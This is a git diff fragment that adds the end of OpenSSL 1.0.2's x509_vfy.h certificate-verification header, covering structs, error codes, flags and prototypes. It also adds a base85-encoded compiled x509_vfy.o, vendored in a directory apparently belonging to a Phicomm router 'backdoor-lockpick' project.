+    /* Check revocation status of chain */
+    int (*check_revocation) (X509_STORE_CTX *ctx);
+    /* retrieve CRL */
+    int (*get_crl) (X509_STORE_CTX *ctx, X509_CRL **crl, X509 *x);
+    /* Check CRL validity */
+    int (*check_crl) (X509_STORE_CTX *ctx, X509_CRL *crl);
+    /* Check certificate against CRL */
+    int (*cert_crl) (X509_STORE_CTX *ctx, X509_CRL *crl, X509 *x);
+    STACK_OF(X509) *(*lookup_certs) (X509_STORE_CTX *ctx, X509_NAME *nm);
+    STACK_OF(X509_CRL) *(*lookup_crls) (X509_STORE_CTX *ctx, X509_NAME *nm);
+    int (*cleanup) (X509_STORE_CTX *ctx);
+    CRYPTO_EX_DATA ex_data;
+    int references;
+} /* X509_STORE */ ;
+
+int X509_STORE_set_depth(X509_STORE *store, int depth);
+
+# define X509_STORE_set_verify_cb_func(ctx,func) ((ctx)->verify_cb=(func))
+# define X509_STORE_set_verify_func(ctx,func)    ((ctx)->verify=(func))
+
+/* This is the functions plus an instance of the local variables. */
+struct x509_lookup_st {
+    int init;                   /* have we been started */
+    int skip;                   /* don't use us. */
+    X509_LOOKUP_METHOD *method; /* the functions */
+    char *method_data;          /* method data */
+    X509_STORE *store_ctx;      /* who owns us */
+} /* X509_LOOKUP */ ;
+
+/*
+ * This is a used when verifying cert chains.  Since the gathering of the
+ * cert chain can take some time (and have to be 'retried', this needs to be
+ * kept and passed around.
+ */
+struct x509_store_ctx_st {      /* X509_STORE_CTX */
+    X509_STORE *ctx;
+    /* used when looking up certs */
+    int current_method;
+    /* The following are set by the caller */
+    /* The cert to check */
+    X509 *cert;
+    /* chain of X509s - untrusted - passed in */
+    STACK_OF(X509) *untrusted;
+    /* set of CRLs passed in */
+    STACK_OF(X509_CRL) *crls;
+    X509_VERIFY_PARAM *param;
+    /* Other info for use with get_issuer() */
+    void *other_ctx;
+    /* Callbacks for various operations */
+    /* called to verify a certificate */
+    int (*verify) (X509_STORE_CTX *ctx);
+    /* error callback */
+    int (*verify_cb) (int ok, X509_STORE_CTX *ctx);
+    /* get issuers cert from ctx */
+    int (*get_issuer) (X509 **issuer, X509_STORE_CTX *ctx, X509 *x);
+    /* check issued */
+    int (*check_issued) (X509_STORE_CTX *ctx, X509 *x, X509 *issuer);
+    /* Check revocation status of chain */
+    int (*check_revocation) (X509_STORE_CTX *ctx);
+    /* retrieve CRL */
+    int (*get_crl) (X509_STORE_CTX *ctx, X509_CRL **crl, X509 *x);
+    /* Check CRL validity */
+    int (*check_crl) (X509_STORE_CTX *ctx, X509_CRL *crl);
+    /* Check certificate against CRL */
+    int (*cert_crl) (X509_STORE_CTX *ctx, X509_CRL *crl, X509 *x);
+    int (*check_policy) (X509_STORE_CTX *ctx);
+    STACK_OF(X509) *(*lookup_certs) (X509_STORE_CTX *ctx, X509_NAME *nm);
+    STACK_OF(X509_CRL) *(*lookup_crls) (X509_STORE_CTX *ctx, X509_NAME *nm);
+    int (*cleanup) (X509_STORE_CTX *ctx);
+    /* The following is built up */
+    /* if 0, rebuild chain */
+    int valid;
+    /* index of last untrusted cert */
+    int last_untrusted;
+    /* chain of X509s - built up and trusted */
+    STACK_OF(X509) *chain;
+    /* Valid policy tree */
+    X509_POLICY_TREE *tree;
+    /* Require explicit policy value */
+    int explicit_policy;
+    /* When something goes wrong, this is why */
+    int error_depth;
+    int error;
+    X509 *current_cert;
+    /* cert currently being tested as valid issuer */
+    X509 *current_issuer;
+    /* current CRL */
+    X509_CRL *current_crl;
+    /* score of current CRL */
+    int current_crl_score;
+    /* Reason mask */
+    unsigned int current_reasons;
+    /* For CRL path validation: parent context */
+    X509_STORE_CTX *parent;
+    CRYPTO_EX_DATA ex_data;
+} /* X509_STORE_CTX */ ;
+
+void X509_STORE_CTX_set_depth(X509_STORE_CTX *ctx, int depth);
+
+# define X509_STORE_CTX_set_app_data(ctx,data) \
+        X509_STORE_CTX_set_ex_data(ctx,0,data)
+# define X509_STORE_CTX_get_app_data(ctx) \
+        X509_STORE_CTX_get_ex_data(ctx,0)
+
+# define X509_L_FILE_LOAD        1
+# define X509_L_ADD_DIR          2
+
+# define X509_LOOKUP_load_file(x,name,type) \
+                X509_LOOKUP_ctrl((x),X509_L_FILE_LOAD,(name),(long)(type),NULL)
+
+# define X509_LOOKUP_add_dir(x,name,type) \
+                X509_LOOKUP_ctrl((x),X509_L_ADD_DIR,(name),(long)(type),NULL)
+
+# define         X509_V_OK                                       0
+/* illegal error (for uninitialized values, to avoid X509_V_OK): 1 */
+
+# define         X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT            2
+# define         X509_V_ERR_UNABLE_TO_GET_CRL                    3
+# define         X509_V_ERR_UNABLE_TO_DECRYPT_CERT_SIGNATURE     4
+# define         X509_V_ERR_UNABLE_TO_DECRYPT_CRL_SIGNATURE      5
+# define         X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY   6
+# define         X509_V_ERR_CERT_SIGNATURE_FAILURE               7
+# define         X509_V_ERR_CRL_SIGNATURE_FAILURE                8
+# define         X509_V_ERR_CERT_NOT_YET_VALID                   9
+# define         X509_V_ERR_CERT_HAS_EXPIRED                     10
+# define         X509_V_ERR_CRL_NOT_YET_VALID                    11
+# define         X509_V_ERR_CRL_HAS_EXPIRED                      12
+# define         X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD       13
+# define         X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD        14
+# define         X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD       15
+# define         X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD       16
+# define         X509_V_ERR_OUT_OF_MEM                           17
+# define         X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT          18
+# define         X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN            19
+# define         X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY    20
+# define         X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE      21
+# define         X509_V_ERR_CERT_CHAIN_TOO_LONG                  22
+# define         X509_V_ERR_CERT_REVOKED                         23
+# define         X509_V_ERR_INVALID_CA                           24
+# define         X509_V_ERR_PATH_LENGTH_EXCEEDED                 25
+# define         X509_V_ERR_INVALID_PURPOSE                      26
+# define         X509_V_ERR_CERT_UNTRUSTED                       27
+# define         X509_V_ERR_CERT_REJECTED                        28
+/* These are 'informational' when looking for issuer cert */
+# define         X509_V_ERR_SUBJECT_ISSUER_MISMATCH              29
+# define         X509_V_ERR_AKID_SKID_MISMATCH                   30
+# define         X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH          31
+# define         X509_V_ERR_KEYUSAGE_NO_CERTSIGN                 32
+
+# define         X509_V_ERR_UNABLE_TO_GET_CRL_ISSUER             33
+# define         X509_V_ERR_UNHANDLED_CRITICAL_EXTENSION         34
+# define         X509_V_ERR_KEYUSAGE_NO_CRL_SIGN                 35
+# define         X509_V_ERR_UNHANDLED_CRITICAL_CRL_EXTENSION     36
+# define         X509_V_ERR_INVALID_NON_CA                       37
+# define         X509_V_ERR_PROXY_PATH_LENGTH_EXCEEDED           38
+# define         X509_V_ERR_KEYUSAGE_NO_DIGITAL_SIGNATURE        39
+# define         X509_V_ERR_PROXY_CERTIFICATES_NOT_ALLOWED       40
+
+# define         X509_V_ERR_INVALID_EXTENSION                    41
+# define         X509_V_ERR_INVALID_POLICY_EXTENSION             42
+# define         X509_V_ERR_NO_EXPLICIT_POLICY                   43
+# define         X509_V_ERR_DIFFERENT_CRL_SCOPE                  44
+# define         X509_V_ERR_UNSUPPORTED_EXTENSION_FEATURE        45
+
+# define         X509_V_ERR_UNNESTED_RESOURCE                    46
+
+# define         X509_V_ERR_PERMITTED_VIOLATION                  47
+# define         X509_V_ERR_EXCLUDED_VIOLATION                   48
+# define         X509_V_ERR_SUBTREE_MINMAX                       49
+# define         X509_V_ERR_UNSUPPORTED_CONSTRAINT_TYPE          51
+# define         X509_V_ERR_UNSUPPORTED_CONSTRAINT_SYNTAX        52
+# define         X509_V_ERR_UNSUPPORTED_NAME_SYNTAX              53
+# define         X509_V_ERR_CRL_PATH_VALIDATION_ERROR            54
+
+/* Suite B mode algorithm violation */
+# define         X509_V_ERR_SUITE_B_INVALID_VERSION              56
+# define         X509_V_ERR_SUITE_B_INVALID_ALGORITHM            57
+# define         X509_V_ERR_SUITE_B_INVALID_CURVE                58
+# define         X509_V_ERR_SUITE_B_INVALID_SIGNATURE_ALGORITHM  59
+# define         X509_V_ERR_SUITE_B_LOS_NOT_ALLOWED              60
+# define         X509_V_ERR_SUITE_B_CANNOT_SIGN_P_384_WITH_P_256 61
+
+/* Host, email and IP check errors */
+# define         X509_V_ERR_HOSTNAME_MISMATCH                    62
+# define         X509_V_ERR_EMAIL_MISMATCH                       63
+# define         X509_V_ERR_IP_ADDRESS_MISMATCH                  64
+
+/* The application is not happy */
+# define         X509_V_ERR_APPLICATION_VERIFICATION             50
+
+/* Certificate verify flags */
+
+/* Send issuer+subject checks to verify_cb */
+# define X509_V_FLAG_CB_ISSUER_CHECK             0x1
+/* Use check time instead of current time */
+# define X509_V_FLAG_USE_CHECK_TIME              0x2
+/* Lookup CRLs */
+# define X509_V_FLAG_CRL_CHECK                   0x4
+/* Lookup CRLs for whole chain */
+# define X509_V_FLAG_CRL_CHECK_ALL               0x8
+/* Ignore unhandled critical extensions */
+# define X509_V_FLAG_IGNORE_CRITICAL             0x10
+/* Disable workarounds for broken certificates */
+# define X509_V_FLAG_X509_STRICT                 0x20
+/* Enable proxy certificate validation */
+# define X509_V_FLAG_ALLOW_PROXY_CERTS           0x40
+/* Enable policy checking */
+# define X509_V_FLAG_POLICY_CHECK                0x80
+/* Policy variable require-explicit-policy */
+# define X509_V_FLAG_EXPLICIT_POLICY             0x100
+/* Policy variable inhibit-any-policy */
+# define X509_V_FLAG_INHIBIT_ANY                 0x200
+/* Policy variable inhibit-policy-mapping */
+# define X509_V_FLAG_INHIBIT_MAP                 0x400
+/* Notify callback that policy is OK */
+# define X509_V_FLAG_NOTIFY_POLICY               0x800
+/* Extended CRL features such as indirect CRLs, alternate CRL signing keys */
+# define X509_V_FLAG_EXTENDED_CRL_SUPPORT        0x1000
+/* Delta CRL support */
+# define X509_V_FLAG_USE_DELTAS                  0x2000
+/* Check selfsigned CA signature */
+# define X509_V_FLAG_CHECK_SS_SIGNATURE          0x4000
+/* Use trusted store first */
+# define X509_V_FLAG_TRUSTED_FIRST               0x8000
+/* Suite B 128 bit only mode: not normally used */
+# define X509_V_FLAG_SUITEB_128_LOS_ONLY         0x10000
+/* Suite B 192 bit only mode */
+# define X509_V_FLAG_SUITEB_192_LOS              0x20000
+/* Suite B 128 bit mode allowing 192 bit algorithms */
+# define X509_V_FLAG_SUITEB_128_LOS              0x30000
+
+/* Allow partial chains if at least one certificate is in trusted store */
+# define X509_V_FLAG_PARTIAL_CHAIN               0x80000
+
+# define X509_VP_FLAG_DEFAULT                    0x1
+# define X509_VP_FLAG_OVERWRITE                  0x2
+# define X509_VP_FLAG_RESET_FLAGS                0x4
+# define X509_VP_FLAG_LOCKED                     0x8
+# define X509_VP_FLAG_ONCE                       0x10
+
+/* Internal use: mask of policy related options */
+# define X509_V_FLAG_POLICY_MASK (X509_V_FLAG_POLICY_CHECK \
+                                | X509_V_FLAG_EXPLICIT_POLICY \
+                                | X509_V_FLAG_INHIBIT_ANY \
+                                | X509_V_FLAG_INHIBIT_MAP)
+
+int X509_OBJECT_idx_by_subject(STACK_OF(X509_OBJECT) *h, int type,
+                               X509_NAME *name);
+X509_OBJECT *X509_OBJECT_retrieve_by_subject(STACK_OF(X509_OBJECT) *h,
+                                             int type, X509_NAME *name);
+X509_OBJECT *X509_OBJECT_retrieve_match(STACK_OF(X509_OBJECT) *h,
+                                        X509_OBJECT *x);
+void X509_OBJECT_up_ref_count(X509_OBJECT *a);
+void X509_OBJECT_free_contents(X509_OBJECT *a);
+X509_STORE *X509_STORE_new(void);
+void X509_STORE_free(X509_STORE *v);
+
+STACK_OF(X509) *X509_STORE_get1_certs(X509_STORE_CTX *st, X509_NAME *nm);
+STACK_OF(X509_CRL) *X509_STORE_get1_crls(X509_STORE_CTX *st, X509_NAME *nm);
+int X509_STORE_set_flags(X509_STORE *ctx, unsigned long flags);
+int X509_STORE_set_purpose(X509_STORE *ctx, int purpose);
+int X509_STORE_set_trust(X509_STORE *ctx, int trust);
+int X509_STORE_set1_param(X509_STORE *ctx, X509_VERIFY_PARAM *pm);
+
+void X509_STORE_set_verify_cb(X509_STORE *ctx,
+                              int (*verify_cb) (int, X509_STORE_CTX *));
+
+void X509_STORE_set_lookup_crls_cb(X509_STORE *ctx,
+                                   STACK_OF(X509_CRL) *(*cb) (X509_STORE_CTX
+                                                              *ctx,
+                                                              X509_NAME *nm));
+
+X509_STORE_CTX *X509_STORE_CTX_new(void);
+
+int X509_STORE_CTX_get1_issuer(X509 **issuer, X509_STORE_CTX *ctx, X509 *x);
+
+void X509_STORE_CTX_free(X509_STORE_CTX *ctx);
+int X509_STORE_CTX_init(X509_STORE_CTX *ctx, X509_STORE *store,
+                        X509 *x509, STACK_OF(X509) *chain);
+void X509_STORE_CTX_trusted_stack(X509_STORE_CTX *ctx, STACK_OF(X509) *sk);
+void X509_STORE_CTX_cleanup(X509_STORE_CTX *ctx);
+
+X509_STORE *X509_STORE_CTX_get0_store(X509_STORE_CTX *ctx);
+
+X509_LOOKUP *X509_STORE_add_lookup(X509_STORE *v, X509_LOOKUP_METHOD *m);
+
+X509_LOOKUP_METHOD *X509_LOOKUP_hash_dir(void);
+X509_LOOKUP_METHOD *X509_LOOKUP_file(void);
+
+int X509_STORE_add_cert(X509_STORE *ctx, X509 *x);
+int X509_STORE_add_crl(X509_STORE *ctx, X509_CRL *x);
+
+int X509_STORE_get_by_subject(X509_STORE_CTX *vs, int type, X509_NAME *name,
+                              X509_OBJECT *ret);
+
+int X509_LOOKUP_ctrl(X509_LOOKUP *ctx, int cmd, const char *argc,
+                     long argl, char **ret);
+
+# ifndef OPENSSL_NO_STDIO
+int X509_load_cert_file(X509_LOOKUP *ctx, const char *file, int type);
+int X509_load_crl_file(X509_LOOKUP *ctx, const char *file, int type);
+int X509_load_cert_crl_file(X509_LOOKUP *ctx, const char *file, int type);
+# endif
+
+X509_LOOKUP *X509_LOOKUP_new(X509_LOOKUP_METHOD *method);
+void X509_LOOKUP_free(X509_LOOKUP *ctx);
+int X509_LOOKUP_init(X509_LOOKUP *ctx);
+int X509_LOOKUP_by_subject(X509_LOOKUP *ctx, int type, X509_NAME *name,
+                           X509_OBJECT *ret);
+int X509_LOOKUP_by_issuer_serial(X509_LOOKUP *ctx, int type, X509_NAME *name,
+                                 ASN1_INTEGER *serial, X509_OBJECT *ret);
+int X509_LOOKUP_by_fingerprint(X509_LOOKUP *ctx, int type,
+                               unsigned char *bytes, int len,
+                               X509_OBJECT *ret);
+int X509_LOOKUP_by_alias(X509_LOOKUP *ctx, int type, char *str, int len,
+                         X509_OBJECT *ret);
+int X509_LOOKUP_shutdown(X509_LOOKUP *ctx);
+
+# ifndef OPENSSL_NO_STDIO
+int X509_STORE_load_locations(X509_STORE *ctx,
+                              const char *file, const char *dir);
+int X509_STORE_set_default_paths(X509_STORE *ctx);
+# endif
+
+int X509_STORE_CTX_get_ex_new_index(long argl, void *argp,
+                                    CRYPTO_EX_new *new_func,
+                                    CRYPTO_EX_dup *dup_func,
+                                    CRYPTO_EX_free *free_func);
+int X509_STORE_CTX_set_ex_data(X509_STORE_CTX *ctx, int idx, void *data);
+void *X509_STORE_CTX_get_ex_data(X509_STORE_CTX *ctx, int idx);
+int X509_STORE_CTX_get_error(X509_STORE_CTX *ctx);
+void X509_STORE_CTX_set_error(X509_STORE_CTX *ctx, int s);
+int X509_STORE_CTX_get_error_depth(X509_STORE_CTX *ctx);
+X509 *X509_STORE_CTX_get_current_cert(X509_STORE_CTX *ctx);
+X509 *X509_STORE_CTX_get0_current_issuer(X509_STORE_CTX *ctx);
+X509_CRL *X509_STORE_CTX_get0_current_crl(X509_STORE_CTX *ctx);
+X509_STORE_CTX *X509_STORE_CTX_get0_parent_ctx(X509_STORE_CTX *ctx);
+STACK_OF(X509) *X509_STORE_CTX_get_chain(X509_STORE_CTX *ctx);
+STACK_OF(X509) *X509_STORE_CTX_get1_chain(X509_STORE_CTX *ctx);
+void X509_STORE_CTX_set_cert(X509_STORE_CTX *c, X509 *x);
+void X509_STORE_CTX_set_chain(X509_STORE_CTX *c, STACK_OF(X509) *sk);
+void X509_STORE_CTX_set0_crls(X509_STORE_CTX *c, STACK_OF(X509_CRL) *sk);
+int X509_STORE_CTX_set_purpose(X509_STORE_CTX *ctx, int purpose);
+int X509_STORE_CTX_set_trust(X509_STORE_CTX *ctx, int trust);
+int X509_STORE_CTX_purpose_inherit(X509_STORE_CTX *ctx, int def_purpose,
+                                   int purpose, int trust);
+void X509_STORE_CTX_set_flags(X509_STORE_CTX *ctx, unsigned long flags);
+void X509_STORE_CTX_set_time(X509_STORE_CTX *ctx, unsigned long flags,
+                             time_t t);
+void X509_STORE_CTX_set_verify_cb(X509_STORE_CTX *ctx,
+                                  int (*verify_cb) (int, X509_STORE_CTX *));
+
+X509_POLICY_TREE *X509_STORE_CTX_get0_policy_tree(X509_STORE_CTX *ctx);
+int X509_STORE_CTX_get_explicit_policy(X509_STORE_CTX *ctx);
+
+X509_VERIFY_PARAM *X509_STORE_CTX_get0_param(X509_STORE_CTX *ctx);
+void X509_STORE_CTX_set0_param(X509_STORE_CTX *ctx, X509_VERIFY_PARAM *param);
+int X509_STORE_CTX_set_default(X509_STORE_CTX *ctx, const char *name);
+
+/* X509_VERIFY_PARAM functions */
+
+X509_VERIFY_PARAM *X509_VERIFY_PARAM_new(void);
+void X509_VERIFY_PARAM_free(X509_VERIFY_PARAM *param);
+int X509_VERIFY_PARAM_inherit(X509_VERIFY_PARAM *to,
+                              const X509_VERIFY_PARAM *from);
+int X509_VERIFY_PARAM_set1(X509_VERIFY_PARAM *to,
+                           const X509_VERIFY_PARAM *from);
+int X509_VERIFY_PARAM_set1_name(X509_VERIFY_PARAM *param, const char *name);
+int X509_VERIFY_PARAM_set_flags(X509_VERIFY_PARAM *param,
+                                unsigned long flags);
+int X509_VERIFY_PARAM_clear_flags(X509_VERIFY_PARAM *param,
+                                  unsigned long flags);
+unsigned long X509_VERIFY_PARAM_get_flags(X509_VERIFY_PARAM *param);
+int X509_VERIFY_PARAM_set_purpose(X509_VERIFY_PARAM *param, int purpose);
+int X509_VERIFY_PARAM_set_trust(X509_VERIFY_PARAM *param, int trust);
+void X509_VERIFY_PARAM_set_depth(X509_VERIFY_PARAM *param, int depth);
+void X509_VERIFY_PARAM_set_time(X509_VERIFY_PARAM *param, time_t t);
+int X509_VERIFY_PARAM_add0_policy(X509_VERIFY_PARAM *param,
+                                  ASN1_OBJECT *policy);
+int X509_VERIFY_PARAM_set1_policies(X509_VERIFY_PARAM *param,
+                                    STACK_OF(ASN1_OBJECT) *policies);
+
+int X509_VERIFY_PARAM_set1_host(X509_VERIFY_PARAM *param,
+                                const char *name, size_t namelen);
+int X509_VERIFY_PARAM_add1_host(X509_VERIFY_PARAM *param,
+                                const char *name, size_t namelen);
+void X509_VERIFY_PARAM_set_hostflags(X509_VERIFY_PARAM *param,
+                                     unsigned int flags);
+char *X509_VERIFY_PARAM_get0_peername(X509_VERIFY_PARAM *);
+int X509_VERIFY_PARAM_set1_email(X509_VERIFY_PARAM *param,
+                                 const char *email, size_t emaillen);
+int X509_VERIFY_PARAM_set1_ip(X509_VERIFY_PARAM *param,
+                              const unsigned char *ip, size_t iplen);
+int X509_VERIFY_PARAM_set1_ip_asc(X509_VERIFY_PARAM *param,
+                                  const char *ipasc);
+
+int X509_VERIFY_PARAM_get_depth(const X509_VERIFY_PARAM *param);
+const char *X509_VERIFY_PARAM_get0_name(const X509_VERIFY_PARAM *param);
+
+int X509_VERIFY_PARAM_add0_table(X509_VERIFY_PARAM *param);
+int X509_VERIFY_PARAM_get_count(void);
+const X509_VERIFY_PARAM *X509_VERIFY_PARAM_get0(int id);
+const X509_VERIFY_PARAM *X509_VERIFY_PARAM_lookup(const char *name);
+void X509_VERIFY_PARAM_table_cleanup(void);
+
+int X509_policy_check(X509_POLICY_TREE **ptree, int *pexplicit_policy,
+                      STACK_OF(X509) *certs,
+                      STACK_OF(ASN1_OBJECT) *policy_oids, unsigned int flags);
+
+void X509_policy_tree_free(X509_POLICY_TREE *tree);
+
+int X509_policy_tree_level_count(const X509_POLICY_TREE *tree);
+X509_POLICY_LEVEL *X509_policy_tree_get0_level(const X509_POLICY_TREE *tree,
+                                               int i);
+
+STACK_OF(X509_POLICY_NODE) *X509_policy_tree_get0_policies(const
+                                                           X509_POLICY_TREE
+                                                           *tree);
+
+STACK_OF(X509_POLICY_NODE) *X509_policy_tree_get0_user_policies(const
+                                                                X509_POLICY_TREE
+                                                                *tree);
+
+int X509_policy_level_node_count(X509_POLICY_LEVEL *level);
+
+X509_POLICY_NODE *X509_policy_level_get0_node(X509_POLICY_LEVEL *level,
+                                              int i);
+
+const ASN1_OBJECT *X509_policy_node_get0_policy(const X509_POLICY_NODE *node);
+
+STACK_OF(POLICYQUALINFO) *X509_policy_node_get0_qualifiers(const
+                                                           X509_POLICY_NODE
+                                                           *node);
+const X509_POLICY_NODE *X509_policy_node_get0_parent(const X509_POLICY_NODE
+                                                     *node);
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vfy.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_vfy.o
new file mode 100644
index 0000000000000000000000000000000000000000..47bbeebf7c67329fe8c3c49db5379957bb4f3ad7
GIT binary patch
literal 28280
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
